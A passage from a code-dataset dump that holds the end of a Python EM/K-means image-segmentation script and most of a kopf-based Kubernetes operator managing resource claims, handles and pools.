cluster\n\n while (np.abs((cluster - tmp))>epsilon).all():\n tmp = cluster.copy()\n r = Astep(obs_data,cluster)\n cluster = Ustep(obs_data,r)\n return np.reshape(cluster,(2,3))\n\n\ndef EM_algorithm(animal):\n # Input: file = file name to open\n data,image = read_data(animal + \".txt\",True)\n N = len(data)\n d = data.shape[-1] - 2\n obs_data = data[:,2:].reshape(N,d,1)\n mus = np.random.randn(2,d,1)\n X = np.reshape(image, (image.shape[0] * image.shape[1], image.shape[2]))\n clust = Kmeans(obs_data,mus,1e-5)\n # mean value to compute multivariate normal distribution\n mean1 = clust[1]\n mean2 = clust[0]\n # Threshold\n eps = 0.5 \n # covariance to compute multivariate normal distribution\n cov1 = np.cov(np.asarray([[13, 20, 29], [13, 23, 37], [13, 23, 29]]))\n\n cov2 = np.cov(np.asarray([[9, -58, 7], [8, -7, 10], [6, -4, 6]]))\n # mixing co-efficient\n mix1 = 0.4 \n mix2 = 0.6\n # number of samples\n N = image.shape[0] * image.shape[1] \n\n log_likelihoods = []\n\n print(\"EM algorithm for: \"+str(animal))\n\n # Start EM algorithm\n while(1):\n N1 = 0\n N2 = 0\n resp1_list = []\n resp2_list = []\n mu_sum1 = [0, 0, 0]\n mu_sum2 = [0, 0, 0]\n\n for y in image:\n for x in y:\n prob1 = multivariate_normal.pdf(x, mean=mean1, cov=cov1, allow_singular=True) # gaussian density 1\n\n prob2 = multivariate_normal.pdf(x, mean=mean2, cov=cov2, allow_singular=True) # gaussian density 2\n\n Numerator1 = mix1 * prob1\n Numerator2 = mix2 * prob2\n\n denom = Numerator1 + Numerator2\n #responsibility for 1st cluster\n resp1 = Numerator1 / denom \n #responsibility for 2nd cluster\n resp2 = Numerator2 / denom \n\n resp1_list.append(resp1)\n resp2_list.append(resp2)\n mu_sum1 += resp1 * x\n mu_sum2 += resp2 * x\n\n N1 += resp1\n N2 += resp2\n\n # Update mean values\n mu_new1 = mu_sum1 / N1\n mu_new2 = mu_sum2 / N2\n\n var_1 = np.zeros((3, 3))\n var_2 = np.zeros((3, 3))\n\n i = 0\n for y in image:\n for x in y:\n var_1 += resp1_list[i] * np.outer((x - mu_new1), (x - mu_new1))\n var_2 += resp2_list[i] * np.outer((x - mu_new2), (x - mu_new2))\n i = i + 1\n # Update covariances\n var_new1 = var_1 / N1\n var_new2 = var_2 / N2\n # Update mix co-efficients\n mix_new1 = N1 / N \n mix_new2 = N2 / N\n\n mean1 = mu_new1\n mean2 = mu_new2\n\n cov1 = var_new1\n cov2 = var_new2\n\n mix1 = mix_new1\n mix2 = mix_new2\n #Calculate Log Likelihood\n Z = [0, 0]\n ll = 0\n sumList=[]\n for y in image:\n for x in y:\n prob1 = multivariate_normal.pdf(x, mu_new1, var_new1, allow_singular=True)\n\n prob2 = multivariate_normal.pdf(x, mu_new2, var_new2, allow_singular=True)\n\n sum = (mix_new1 * prob1) + (mix_new2 * prob2)\n sumList.append(np.log(sum))\n\n ll = np.sum(np.asarray(sumList))\n\n\n log_likelihoods.append(ll)\n\n if len(log_likelihoods) < 2: continue\n if np.abs(ll - log_likelihoods[-2]) < eps: break\n #Break loop if log likelihoods dont change more than threshold over 2 iterations\n\n print(\"End iteration for: \" + str(animal))\n\n #Write to File\n back_data = data.copy()\n front_data = data.copy()\n mask_data = data.copy()\n\n for i in range(0,len(data)-1):\n\n cell = data[i]\n point = [cell[2], cell[3], cell[4]]\n prob1 = multivariate_normal.pdf(point, mean=mean1, cov=cov1, allow_singular=True)\n\n resp1 = mix1 * prob1\n prob2 = multivariate_normal.pdf(point, mean=mean2, cov=cov2, allow_singular=True)\n resp2 = mix2 * prob2\n\n resp1 = resp1/(resp1+resp2)\n resp2 = resp2/(resp1+resp2)\n\n\n if (resp1 < resp2):\n back_data[i][2] = back_data[i][3] = back_data[i][4] = 0\n mask_data[i][2] = mask_data[i][3] = mask_data[i][4] = 0\n\n else:\n front_data[i][2] = front_data[i][3] = front_data[i][4] = 0\n mask_data[i][2] = 100\n mask_data[i][3] = mask_data[i][4] = 0\n\n data_process(back_data, front_data, mask_data, animal)\n print(\"Finish: \"+str(animal))\n\ndef data_process(data1, data2, data3, filename):\n # Write and save data for background, foreground and mask\n write_data(data1,\"output/\" + str(filename) + \"_back.txt\")\n read_data(\"output/\" + str(filename) + \"_back.txt\", False, save=True, save_name=\"output/\"+str(filename)+\"_background.jpg\")\n \n write_data(data2,\"output/\" + str(filename) + \"_fore.txt\")\n read_data(\"output/\" + str(filename) + \"_fore.txt\", False, save=True, save_name=\"output/\"+str(filename)+\"_foreground.jpg\")\n\n write_data(data3,\"output/\" + str(filename) + \"_mask.txt\")\n read_data(\"output/\" + str(filename) + \"_mask.txt\", False, save=True, save_name=\"output/\"+str(filename)+\"_masked.jpg\")\n\n\ndef main():\n EM_algorithm(\"cow\")\n EM_algorithm(\"fox\")\n EM_algorithm(\"owl\")\n EM_algorithm(\"zebra\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"EM/ImgSegment.py","file_name":"ImgSegment.py","file_ext":"py","file_size_in_byte":9073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"233008607","text":"#!/usr/bin/env python\n\nimport copy\nimport datetime\nimport gpte.kubeoperative\nimport json\nimport kopf\nimport kubernetes\nimport openapi_schema_validator\nimport os\nimport prometheus_client\nimport re\nimport threading\nimport time\n\nfrom gpte.util import defaults_from_schema, dict_merge, recursive_process_template_strings\n\n@kopf.on.startup()\ndef configure(settings: kopf.OperatorSettings, **_):\n # Disable scanning for CustomResourceDefinitions\n settings.scanning.disabled = True\n\nko = gpte.kubeoperative.KubeOperative(\n operator_domain = os.environ.get('OPERATOR_DOMAIN', 'poolboy.gpte.redhat.com')\n)\nproviders = {}\nprovider_init_delay = int(os.environ.get('PROVIDER_INIT_DELAY', 10))\nstart_time = time.time()\n\npool_management_lock = threading.Lock()\n\ndef add_finalizer_to_handle(handle, logger):\n handle_meta = handle['metadata']\n handle_namespace = handle_meta['namespace']\n handle_name = handle_meta['name']\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, handle_namespace, 'resourcehandles', handle_name,\n { 'metadata': { 'finalizers': [ko.operator_domain] } }\n )\n\ndef add_finalizer_to_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_namespace = pool_meta['namespace']\n pool_name = pool_meta['name']\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, pool_namespace, 'resourcepools', pool_name,\n { 'metadata': { 'finalizers': [ko.operator_domain] } }\n )\n\ndef bind_handle_to_claim(handle, claim, logger):\n claim_meta = claim['metadata']\n claim_namespace = claim_meta['namespace']\n claim_name = claim_meta['name']\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n pool_ref = handle['spec'].get('resourcePool')\n\n logger.info(\n 'binding ResourceHandle %s to RsourceClaim %s in %s',\n handle_name, claim_name, claim_namespace\n )\n\n handle = ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name,\n {\n 'metadata': {\n 'labels': {\n ko.operator_domain + '/resource-claim-name': claim_name,\n ko.operator_domain + '/resource-claim-namespace': claim_namespace\n }\n },\n 'spec': {\n 'resourceClaim': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceClaim',\n 'name': claim_name,\n 'namespace': claim_namespace\n }\n }\n }\n )\n\n if pool_ref:\n manage_pool_by_ref(pool_ref, logger)\n\n return handle\n\ndef create_handle_for_claim(claim, logger):\n \"\"\"\n Create resoruce handle for claim, called after claim is validated and failed\n to match an available handle.\n \"\"\"\n claim_name = claim['metadata']['name']\n claim_namespace = claim['metadata']['namespace']\n claim_resource_statuses = claim['status']['resources']\n\n resources = []\n for i, claim_resource in enumerate(claim['spec']['resources']):\n resources.append({\n 'provider': claim_resource_statuses[i]['provider'],\n 'template': claim_resource['template']\n })\n\n return ko.custom_objects_api.create_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles',\n {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceHandle',\n 'metadata': {\n 'finalizers': [ ko.operator_domain ],\n 'generateName': 'guid-',\n 'labels': {\n ko.operator_domain + '/resource-claim-name': claim_name,\n ko.operator_domain + '/resource-claim-namespace': claim_namespace\n }\n },\n 'spec': {\n 'resourceClaim': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceClaim',\n 'name': claim_name,\n 'namespace': claim_namespace\n },\n 'resources': resources\n }\n }\n )\n\ndef create_handle_for_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_spec = pool['spec']\n pool_namespace = pool_meta['namespace']\n pool_name = pool_meta['name']\n\n return ko.custom_objects_api.create_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles',\n {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceHandle',\n 'metadata': {\n 'finalizers': [\n ko.operator_domain\n ],\n 'generateName': 'guid-',\n 'labels': {\n ko.operator_domain + '/resource-pool-name': pool_name,\n ko.operator_domain + '/resource-pool-namespace': pool_namespace\n }\n },\n 'spec': {\n 'resourcePool': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourcePool',\n 'name': pool_name,\n 'namespace': pool_namespace\n },\n 'resources': pool_spec['resources']\n }\n }\n )\n\ndef delete_resource_handle(name, logger):\n try:\n ko.custom_objects_api.delete_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', name\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status != 404:\n raise\n\ndef delete_unbound_handles_for_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_name = pool_meta['name']\n for handle in get_unbound_handles_for_pool(pool_name, logger):\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n ko.custom_objects_api.delete_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name\n )\n\ndef get_claim_for_handle(handle, logger):\n if 'resourceClaim' not in handle['spec']:\n return None\n\n claim_ref = handle['spec']['resourceClaim']\n claim_name = claim_ref['name']\n claim_namespace = claim_ref['namespace']\n try:\n return ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, claim_namespace,\n 'resourceclaims', claim_name\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n return None\n else:\n raise\n\ndef get_requester_from_namespace(namespace):\n resource_claim_namespace = ko.core_v1_api.read_namespace(namespace)\n requester_user_name = resource_claim_namespace.metadata.annotations.get(\n 'openshift.io/requester', None\n )\n if not requester_user_name:\n return None, None\n\n requester_user = requester_identity = None\n try:\n requester_user = ko.custom_objects_api.get_cluster_custom_object(\n 'user.openshift.io', 'v1', 'users', requester_user_name\n )\n if requester_user.get('identities', None):\n requester_identity = ko.custom_objects_api.get_cluster_custom_object(\n 'user.openshift.io', 'v1', 'identities', requester_user['identities'][0]\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status not in (404, 422):\n raise\n\n return requester_identity, requester_user\n\ndef get_resource_handle(name, logger):\n try:\n return ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', name\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n return None\n else:\n raise\n\ndef get_unbound_handles_for_pool(pool_name, logger):\n return ko.custom_objects_api.list_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles',\n label_selector='{0}/resource-pool-name={1},!{0}/resource-claim-name'.format(\n ko.operator_domain, pool_name\n )\n ).get('items', [])\n\ndef log_claim_event(claim, logger, msg):\n logger.info(\n \"ResourceClaim %s in %s: %s\",\n claim['metadata']['name'],\n claim['metadata']['namespace'],\n msg\n )\n # FIXME - Create event for claim\n\ndef log_handle_event(handle, logger, msg):\n logger.info(\n \"ResourceHandle %s: %s\",\n handle['metadata']['name'],\n msg\n )\n # FIXME - Create event for handle\n\ndef manage_claim(claim, logger):\n \"\"\"\n Called on each ResourceClaim event\n \"\"\"\n claim_status = claim.get('status', None)\n if not claim_status:\n manage_claim_create(claim, logger)\n return\n\n annotations = claim['metadata'].get('annotations', {})\n if ko.operator_domain + '/resource-claim-init-timestamp' not in annotations:\n manage_claim_init(claim, logger)\n elif validate_claim(claim, logger):\n if 'resourceHandle' not in claim_status:\n manage_claim_bind(claim, logger)\n else:\n manage_claim_update(claim, logger)\n\ndef manage_claim_bind(claim, logger):\n \"\"\"\n Called on claim event if ResourceClaim is not bound to a ResourceHandle\n \"\"\"\n handle = match_handle_to_claim(claim, logger)\n if handle:\n bind_handle_to_claim(handle, claim, logger)\n else:\n handle = create_handle_for_claim(claim, logger)\n\n claim_meta = claim['metadata']\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n ko.custom_objects_api.patch_namespaced_custom_object_status(\n ko.operator_domain, ko.version, claim_meta['namespace'], 'resourceclaims', claim_meta['name'],\n {\n 'status': {\n 'resourceHandle': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceHandle',\n 'name': handle_name,\n 'namespace': handle_meta['namespace']\n }\n }\n }\n )\n\n log_claim_event(\n claim, logger, 'Bound ResourceHandle ' + handle_name\n )\n\ndef manage_claim_create(claim, logger):\n \"\"\"\n Called on ch claim event if the claim does not have a status\n This method will attempt to match ResourceProviders to each resource\n for the claim and set the names of the resource providers in the\n status.\n \"\"\"\n claim_meta = claim['metadata']\n claim_spec = claim['spec']\n\n resources = claim_spec.get('resources', None)\n if not resources:\n log_claim_event(claim, logger, 'no resources found')\n return\n\n resource_providers = []\n for i, resource in enumerate(resources):\n # Use specified provider if given\n provider_name = resource.get('provider', {}).get('name')\n if provider_name:\n provider = ResourceProvider.find_provider_by_name(provider_name)\n if not provider:\n log_claim_event(\n claim, logger, 'ResourceProvider {} not found'.format(provider_name)\n )\n return\n resource_providers.append(provider)\n elif 'template' in resource:\n provider = ResourceProvider.find_provider_by_template_match(resource['template'])\n if not provider:\n log_claim_event(\n claim, logger,\n 'Unable to match spec.resources[{}].template to ResourceProvider'.format(i)\n )\n return\n resource_providers.append(provider)\n\n ko.custom_objects_api.patch_namespaced_custom_object_status(\n ko.operator_domain, ko.version, claim_meta['namespace'], 'resourceclaims', claim_meta['name'],\n {\n 'status': {\n 'resources': [{\n 'provider': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceProvider',\n 'name': provider.name,\n 'namespace': provider.namespace\n },\n 'resource': None\n } for provider in resource_providers]\n }\n }\n )\n\ndef manage_claim_deleted(claim, logger):\n claim_meta = claim['metadata']\n claim_name = claim_meta['name']\n claim_namespace = claim_meta['namespace']\n handle_ref = claim.get('status', {}).get('resourceHandle', None)\n\n if handle_ref:\n handle_name = handle_ref['name']\n logger.info('Propagating delete to ResourceHandle %s', handle_name)\n delete_resource_handle(handle_name, logger)\n\ndef manage_claim_init(claim, logger):\n \"\"\"\n Called after claim has resources matched to providers but\n resource-claim-init-timestamp annotation is not yet set.\n \"\"\"\n claim_resources = claim['spec'].get('resources', [])\n claim_status_resources = claim['status'].get('resources', [])\n claim_resources_update = []\n update = {\n \"metadata\": {\n \"annotations\": {\n ko.operator_domain + '/resource-claim-init-timestamp':\n datetime.datetime.utcnow().strftime('%FT%TZ')\n }\n },\n 'spec': { 'resources': claim_resources_update }\n }\n for i, resource in enumerate(claim_resources):\n try:\n claim_status_resource = claim_status_resources[i]\n provider_ref = claim_status_resource['provider']\n provider = ResourceProvider.find_provider_by_name(provider_ref['name'])\n if not provider:\n log_claim_event(\n claim, logger,\n \"Unable to find ResourceProvider \" + provider_name\n )\n return\n else:\n claim_resources_update.append({\n 'provider': provider_ref,\n 'template': provider.resource_claim_template_defaults(\n resource_claim = claim,\n resource_index = i\n )\n })\n\n except IndexError:\n logger.warning('ResourceClaim has more resources in spec than resourceProviders in status!')\n return\n\n ko.patch_resource(\n claim, update, [\n # Update anything in metadata on init\n { 'pathMatch': '/metadata/.*', 'allowedOps': ['add', 'replace'] },\n # Update anything in resources[].provider\n { 'pathMatch': '/spec/resources/[0-9]+/provider(/.*)?', 'allowedOps': ['add', 'replace'] },\n # Only process default overrides in template\n { 'pathMatch': '/spec/resources/[0-9]+/template(/.*)?', 'allowedOps': ['add'] },\n ]\n )\n\ndef manage_claim_resource_delete(claim_namespace, claim_name, resource, resource_index):\n resource_kind = resource['kind']\n resource_meta = resource['metadata']\n resource_name = resource_meta['name']\n resource_namespace = resource_meta.get('namespace', None)\n if resource_namespace:\n ko.logger.info('ResourceClaim {} in {} lost resource {} {} in {}'.format(\n claim_name, claim_namespace, resource_kind, resource_name, resource_namespace\n ))\n else:\n ko.logger.info('ResourceClaim {} in {} lost resource {} {}'.format(\n claim_name, claim_namespace, resource_kind, resource_name\n ))\n try:\n claim = ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name\n )\n status_resources = claim['status']['resources']\n status_resource = status_resources[resource_index].get('state', None)\n\n if status_resource \\\n and status_resource['metadata']['name'] == resource_name \\\n and status_resource['metadata']['namespace'] == resource_namespace:\n status_resources[resource_index]['state'] = resource\n ko.custom_objects_api.patch_namespaced_custom_object_status(\n ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name,\n { 'status': { 'resources': status_resources } }\n )\n except (IndexError, KeyError):\n pass\n except kubernetes.client.rest.ApiException as e:\n if e.status != 404:\n raise\n\ndef manage_claim_resource_update(claim_namespace, claim_name, resource, resource_index):\n resource_kind = resource['kind']\n resource_meta = resource['metadata']\n resource_name = resource_meta['name']\n resource_namespace = resource_meta.get('namespace', None)\n if resource_namespace:\n ko.logger.info('ResourceClaim {} in {} resource status change for {} {} in {}'.format(\n claim_name, claim_namespace, resource_kind, resource_name, resource_namespace\n ))\n else:\n ko.logger.info('ResourceClaim {} in {} resource status change for {} {}'.format(\n claim_name, claim_namespace, resource_kind, resource_name\n ))\n\n try:\n claim = ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name\n )\n status_resources = claim['status']['resources']\n status_resource = status_resources[resource_index].get('state', None)\n\n if not status_resource or (\n status_resource['metadata']['name'] == resource_name and\n status_resource['metadata']['namespace'] == resource_namespace and\n status_resource != resource\n ):\n status_resources[resource_index]['state'] = resource\n ko.custom_objects_api.patch_namespaced_custom_object_status(\n ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name,\n { 'status': { 'resources': status_resources } }\n )\n except (IndexError, KeyError):\n pass\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n ko.logger.info('ResourceClaim %s in %s not found', claim_name, claim_namespace)\n else:\n raise\n\ndef manage_claim_update(claim, logger):\n \"\"\"\n Called on each claim event once ResourceClaim is bound to a ResourceHandle\n\n Claim has already been validated. Propagate changes from claim to handle.\n \"\"\"\n handle_name = claim['status']['resourceHandle']['name']\n resource_handle = get_resource_handle(handle_name, logger)\n if not resource_handle:\n log_claim_event(\n claim, logger, 'ResourceHandle {} has been lost'.format(handle_name)\n )\n return\n\n have_update = False\n handle_resources = resource_handle['spec']['resources']\n for i, claim_resource in enumerate(claim['spec']['resources']):\n handle_resource = handle_resources[i]\n if handle_resource['template'] != claim_resource['template']:\n handle_resource['template'] = claim_resource['template']\n have_update = True\n\n if have_update:\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name,\n { 'spec': { 'resources': handle_resources } }\n )\n\ndef manage_handle(handle, logger):\n \"\"\"\n Called on all ResourceHandle events except delete\n \"\"\"\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n if 'deletionTimestamp' in handle['metadata']:\n manage_handle_pending_delete(handle, logger)\n return\n elif 'finalizers' not in handle_meta:\n add_finalizer_to_handle(handle, logger)\n return\n elif 'resourceClaim' in handle['spec']:\n claim = get_claim_for_handle(handle, logger)\n if not claim:\n delete_resource_handle(handle_name, logger)\n return\n else:\n claim = None\n\n providers = []\n handle_resources = handle['spec']['resources']\n for handle_resource in handle_resources:\n provider_name = handle_resource['provider']['name']\n provider = ResourceProvider.find_provider_by_name(provider_name)\n if provider:\n providers.append(provider)\n else:\n log_handle_event(handle, logger, 'Unable to find ResourceProvider ' + provider_name)\n return\n\n have_handle_update = False\n resources_to_create = []\n for i, handle_resource in enumerate(handle_resources):\n provider = providers[i]\n\n if provider.resource_requires_claim and not claim:\n continue\n\n resource_definition = provider.resource_definition_from_template(\n handle, claim, i, logger\n )\n start_resource_watch(resource_definition)\n\n resource_api_version = resource_definition['apiVersion']\n resource_kind = resource_definition['kind']\n resource_name = resource_definition['metadata']['name']\n resource_namespace = resource_definition['metadata'].get('namespace', None)\n\n reference = {\n 'apiVersion': resource_definition['apiVersion'],\n 'kind': resource_definition['kind'],\n 'name': resource_definition['metadata']['name']\n }\n if 'namespace' in resource_definition['metadata']:\n reference['namespace'] = resource_definition['metadata']['namespace']\n\n if reference != handle_resource.get('reference', None):\n have_handle_update = True\n handle_resource['reference'] = reference\n\n resource = ko.get_resource(\n api_version = resource_api_version,\n kind = resource_kind,\n name = resource_name,\n namespace = resource_namespace\n )\n if hasattr(resource, 'to_dict'):\n resource = resource.to_dict()\n\n if resource:\n provider.update_resource(handle, resource, resource_definition, logger)\n else:\n resources_to_create.append(resource_definition)\n\n if have_handle_update:\n try:\n handle = ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name,\n { 'spec': { 'resources': handle_resources } }\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status != 404:\n raise\n\n for resource_definition in resources_to_create:\n resource_definition['metadata']['annotations'][ko.operator_domain + '/resource-handle-version'] = \\\n handle['metadata']['resourceVersion']\n ko.create_resource(resource_definition)\n\ndef manage_handle_deleted(handle, logger):\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n logger.info('ResourceHandle %s deleted', handle_name)\n\n claim_ref = handle['spec'].get('resourceClaim')\n pool_ref = handle['spec'].get('resourcePool')\n\n # Delete of unclaimed handle from pool may require replacement\n if pool_ref and not claim_ref:\n manage_pool_by_ref(pool_ref, logger)\n\ndef manage_handle_lost_resource(handle_name, resource, resource_index):\n try:\n handle = ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace,\n 'resourcehandles', handle_name\n )\n if 'deletionTimestamp' not in handle['metadata']:\n return\n\n reference = handle['spec']['resources'][resource_index]['reference']\n if reference['apiVersion'] == resource['apiVersion'] \\\n and reference['kind'] == resource['kind'] \\\n and reference['name'] == resource['metadata']['name'] \\\n and reference['namespace'] == resource['metadata']['namespace']:\n resources_update = [{} for i in range(resource_index)]\n resources_update[resource_index] = {'reference': None}\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace,\n 'resourcehandles', handle_meta['name'],\n { 'spec': { 'resources': resources_update } }\n )\n except IndexError:\n pass\n except KeyError:\n pass\n except kubernetes.client.rest.ApiException as e:\n if e.status != 404:\n raise\n\ndef manage_handle_pending_delete(handle, logger):\n for resource in handle['spec']['resources']:\n reference = resource.get('reference', None)\n if reference:\n ko.delete_resource(\n reference['apiVersion'], reference['kind'],\n reference['name'], reference.get('namespace', None)\n )\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace,\n 'resourcehandles', handle['metadata']['name'],\n { 'metadata': { 'finalizers': None } }\n )\n\ndef manage_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_namespace = pool_meta['namespace']\n pool_name = pool_meta['name']\n\n if pool_namespace != ko.operator_namespace:\n logger.info('Ignoring ResourcePool %s in namespace %s', pool_name, pool_namespace)\n return\n\n if not pool['metadata'].get('finalizers', None):\n add_finalizer_to_pool(pool, logger)\n return\n\n with pool_management_lock:\n unbound_handle_count = len(get_unbound_handles_for_pool(pool_name, logger))\n handle_deficit = pool['spec'].get('minAvailable', 0) - unbound_handle_count\n if handle_deficit <= 0:\n return\n for i in range(handle_deficit):\n handle = create_handle_for_pool(pool, logger)\n logger.info('Created ResourceHandle %s for ResourcePool %s', handle['metadata']['name'], pool_name)\n\ndef manage_pool_by_ref(ref, logger):\n try:\n pool = ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, ref['namespace'],\n 'resourcepools', ref['name']\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n logger.warning('Unable to find ResourcePool %s/%s', ref['namespace'], ref['name'])\n return\n else:\n raise\n manage_pool(pool, logger)\n\ndef manage_pool_deleted(pool, logger):\n pool_meta = pool['metadata']\n pool_name = pool_meta['name']\n logger.info('ResourcePool %s deleted', pool_name)\n\ndef manage_pool_pending_delete(pool, logger):\n pool_meta = pool['metadata']\n pool_name = pool_meta['name']\n delete_unbound_handles_for_pool(pool, logger)\n handle = ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcepools', pool_name,\n { 'metadata': { 'finalizers': None } }\n )\n\ndef match_handle_to_claim(claim, logger):\n \"\"\"\n List unbound ResourceHandles and attempt to match one to ResourceClaim\n\n The claim may specify a specific resource pool in an annotation to restrict\n the search to a specific pool.\n \"\"\"\n claim_meta = claim['metadata']\n annotations = claim_meta.get('annotations', {})\n pool_name = annotations.get(ko.operator_domain + '/resource-pool-name', None)\n if pool_name:\n label_selector = '!{0}/resource-claim-name,{0}/resource-pool-name={1}'.format(\n ko.operator_domain, pool_name\n )\n else:\n label_selector = '!{0}/resource-claim-name'.format(ko.operator_domain)\n\n best_match = None\n best_match_diff_count = None\n best_match_creation_timestamp = None\n for handle in ko.custom_objects_api.list_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles',\n label_selector=label_selector\n ).get('items', []):\n claim_resources = claim['spec']['resources']\n status_resources = claim['status']['resources']\n handle_resources = handle['spec']['resources']\n if len(claim_resources) != len(handle_resources):\n # Claim cannot match handle if there is a different resource count\n continue\n\n diff_count = 0\n is_match = True\n for i, claim_resource in enumerate(claim_resources):\n handle_resource = handle_resources[i]\n provider_name = status_resources[i]['provider']['name']\n if provider_name != handle_resource['provider']['name']:\n is_match = False\n break\n provider = ResourceProvider.find_provider_by_name(provider_name)\n diff_patch = provider.check_template_match(handle_resource['template'], claim_resource['template'], logger)\n if diff_patch != None:\n # Match with (possibly empty) difference list\n diff_count += len(diff_patch)\n else:\n is_match = False\n break\n\n if is_match:\n # Prefer match with the smallest diff_count and the earliest creation timestamp\n if not best_match \\\n or best_match_diff_count > diff_count \\\n or (best_match_diff_count == diff_count and best_match_creation_timestamp > handle['metadata']['creationTimestamp']):\n best_match = handle\n best_match_creation_timestamp = handle['metadata']['creationTimestamp']\n best_match_diff_count = diff_count\n\n return best_match\n\ndef pause_for_provider_init():\n if time.time() < start_time + provider_init_delay:\n time.sleep(time.time() - start_time)\n\ndef start_resource_watch(resource_definition):\n api_version = resource_definition['apiVersion']\n metadata = resource_definition['metadata']\n kind = resource_definition['kind']\n namespace = metadata.get('namespace', None)\n\n if namespace:\n watcher_name = '{}:{}:{}'.format(api_version, kind, namespace)\n else:\n watcher_name = '{}:{}'.format(api_version, kind)\n\n if watcher_name in ko.watchers:\n return\n\n if '/' in api_version:\n group, version = api_version.split('/')\n else:\n group, version = None, api_version\n\n w = ko.create_watcher(\n name=watcher_name,\n kind=kind,\n group=group,\n namespace=namespace,\n version=version\n )\n w.handler = watch_resource_event\n w.start()\n\ndef validate_claim(claim, logger):\n \"\"\"\n Check claim validity against providers for resources\n \"\"\"\n resources = claim['spec'].get('resources', [])\n status_resources = claim['status'].get('resources', [])\n\n if len(status_resources) != len(resources):\n logger.warning('Number of resources in status does not match resources in spec')\n return False\n\n for i, resource in enumerate(resources):\n try:\n status_resource = status_resources[i]\n provider_name = status_resource['provider']['name']\n provider = ResourceProvider.find_provider_by_name(provider_name)\n if not provider:\n logger.warning('Unable to find ResourceProvider %s', provider_name)\n return False\n validation_error = provider.validate_resource_template(resource['template'], logger)\n if validation_error:\n logger.warning('Validation failure for spec.resources[%s].template: %s', i, validation_error)\n return False\n except IndexError:\n logger.warning('ResourceClaim has more resources than resourceProviders!')\n return False\n return True\n\ndef watch_resource_event(event):\n event_type = event['type']\n if event_type in ['ADDED', 'DELETED', 'MODIFIED']:\n resource = event['object']\n if hasattr(resource, 'to_dict'):\n resource = resource.to_dict()\n metadata = resource['metadata']\n annotations = metadata.get('annotations', None)\n if not annotations:\n return\n annotation_prefix = ko.operator_domain + '/resource-'\n handle_name = annotations.get(annotation_prefix + 'handle-namespace', None)\n handle_namespace = annotations.get(annotation_prefix + 'handle-namespace', None)\n claim_name = annotations.get(annotation_prefix + 'claim-name', None)\n claim_namespace = annotations.get(annotation_prefix + 'claim-namespace', None)\n resource_index = int(annotations.get(annotation_prefix + 'index', 0))\n\n if not handle_name \\\n or handle_namespace != ko.operator_namespace:\n return\n\n if event_type == 'DELETED':\n manage_handle_lost_resource(handle_name, resource, resource_index)\n\n if claim_name and claim_namespace:\n if event_type == 'DELETED':\n manage_claim_resource_delete(claim_namespace, claim_name, resource, resource_index)\n else:\n manage_claim_resource_update(claim_namespace, claim_name, resource, resource_index)\n else:\n ko.logger.warning(event)\n\nclass ResourceProvider(object):\n\n providers = {}\n resource_watchers = {}\n\n @staticmethod\n def find_provider_by_name(name):\n return ResourceProvider.providers.get(name, None)\n\n @staticmethod\n def find_provider_by_template_match(template):\n for provider in ResourceProvider.providers.values():\n if provider.is_match_for_template(template):\n return provider\n\n @staticmethod\n def manage_provider(provider):\n provider = ResourceProvider(provider)\n ResourceProvider.providers[provider.name] = provider\n\n 